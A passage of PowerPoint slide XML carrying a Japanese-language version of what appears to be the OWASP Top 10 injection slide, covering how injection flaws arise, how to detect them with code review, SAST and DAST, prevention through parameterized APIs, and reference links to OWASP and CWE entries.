              </a:rPr>
              <a:t>コンテキストに応じたエスケープが行われず、動的クエリまたはパラメータ化されていない呼出しがインタープリタに直接使用される。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>オブジェクト・リレーショナル・マッピング（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ORM）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>の検索パラメータに悪意を持ったデータが使用され、重要なレコードを追加で抽出してしまう。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>悪意を持ったデータを直接または連結して使う。例えば、動的クエリ、コマンド、ストアド・プロシージャにおいて構文に悪意を持ったデータを組み合わせる形で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>やコマンドが組み立てられる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>より一般的なインジェクションとしては、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL、NoSQL、OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>コマンド、オブジェクト・リレーショナル・マッピング（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ORM）、LDAP、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>および</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expression Language）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>または</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OGNL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Object Graph Navigation Library）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>のインジェクションがあります。コンセプトはすべてのインタープリタで同じです。ソースコードをレビューすれば、インジェクションに対してアプリケーションが脆弱であるか最も効果的に検出できます。そして、すべてのパラメータ、ヘッダー、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL、Cookie、JSON、SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>および</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>データ入力の完全な自動テストも効果的です。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>また、組織は静的ソースコード解析ツール</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>と動的アプリケーションテストツール</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CI/CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>パイプラインに導入できます。これにより、新たに作られてしまったインジェクション欠陥を稼働環境に展開する前に検出できます。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>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6"/>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Parameterize Queries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ASVS: V5 Input Validation and Encoding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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>インジェクション</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0"/>
              </a:rPr>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>インジェクション</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1"/>
              </a:rPr>
              <a:t>ORM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Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>インジェクション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>インジェクション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>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Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>インジェクション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> Prevention in Java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OWASP Cheat Sheet: Query Parameterization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OWASP Automated Threats to Web Applications – OAT-014</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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId17"/>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7"/>
              </a:rPr>
              <a:t>CWE-77: Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>インジェクション</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8"/>
              </a:rPr>
              <a:t>CWE-89: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>インジェクション</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CWE-564: Hibernate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>インジェクション</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0"/>
              </a:rPr>
              <a:t>CWE-917: Expression Language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>インジェクション</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1"/>
              </a:rPr>
              <a:t>PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>wigger: Server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>injection</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endParaRPr lang="de-DE"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pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>インジェクションを防止するためにはコマンドとクエリからデータを常に分けておくことが必要です。</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推奨される選択肢は安全な</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を使用すること。インタープリタの使用を完全に避ける、パラメータ化されたインターフェースを利用する、または、オブジェクト・リレーショナル・マッピング・ツール（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ORM）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を使用するように移行すること。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>パラメータ化されていたとしても、ストアドプロシージャでは、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PL/SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>または</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>によってクエリとデータを連結したり、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXECUTE IMMEDIATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
